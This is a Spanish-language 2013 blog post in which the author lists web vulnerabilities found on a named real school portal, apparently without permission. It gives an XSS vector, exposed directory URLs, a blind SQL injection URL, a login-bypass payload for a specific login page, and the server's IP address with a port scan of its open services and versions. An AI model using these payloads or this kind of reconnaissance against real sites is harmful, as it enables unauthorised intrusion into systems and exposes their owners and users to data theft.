lunes, 11 de febrero de 2013

Encontrando vulnerabilidades web en conalepsin

Bueno amigos este dia me puse al pedo para traer un par de vulnerabilidades ya que no he estado escribiendo ultimamente y pues ahora que tengo tiempo he de escribir este articulo de un par de vulnerabilidades en conalepsin un portal de aca de sinaloa donde es un centro de estudio siendo asi no deberia haber tantas vulnerabilidades xD....

empecemos por cross site scripting:



Vector: <ScRiPt >prompt(930295)</ScRiPt>

Iss directory enumeration

 http://conalepsin.edu.mx/cms/

muestra los nombres de todos los planteles

Pagina de configuracion
hubiera sido bueno si mostrara las configuraciones, parece ser que es cuando creas una pagina con frontpage :P

http://conalepsin.edu.mx/_vti_inf.html

Un CSRF que no sirve mas que para buscar xD

http://conalepsin.edu.mx/cms/content.asp?company=0&proc=search&procid=hi

Permite diferentes metodos en las cabeceras

OPTIONS, TRACE, GET, HEAD

se salvo de un method put xD

Ohhh pero que es esto? alguien ya estuvo aqui :O

http://conalepsin.edu.mx/cms/database/
http://conalepsin.edu.mx/cms/upload/
http://conalepsin.edu.mx/cms/images/
http://conalepsin.edu.mx/cms/scripts/
http://conalepsin.edu.mx/cms/editor/

muestrame los robots :D

http://conalepsin.edu.mx/robots.txt

y por ultimo tenemos una bonita bsqli

http://conalepsin.edu.mx/cms/content.asp?company=0&proc=news&procid=1' or '38'='39

encontre un par de tablas y columnas nada importantes xD

Bypass Login
http://conalepsin.edu.mx/apps/chekt/Default.aspx
'or 0=0--

Informacion sobre el servidor:

Microsoft-IIS/6.0
Windows
[ASP.NET]
IP:  201.134.74.35
Base de datos:MSAccess
contiene archivos: asp,swf,js,txt

Footprinting:
PORT     STATE    SERVICE        VERSION
21/tcp   open     ftp
25/tcp   filtered smtp
53/tcp   open     domain         Mikrotik RouterOS named or OpenDNS Updater
80/tcp   open     http           Microsoft IIS httpd 6.0
110/tcp  open     pop3           Merak Mail server pop3d 8.0.3
1433/tcp open     ms-sql-s       Microsoft SQL Server 2000 8.00.766; SP3a
1723/tcp open     pptp?
2000/tcp open     bandwidth-test Mikrotik bandwidth-test server
3128/tcp filtered squid-http
3389/tcp open     ms-wbt-server  Microsoft Terminal Service
5190/tcp filtered aol
8291/tcp open     unknown
9999/tcp open     abyss?


No hay comentarios:

Publicar un comentario en la entrada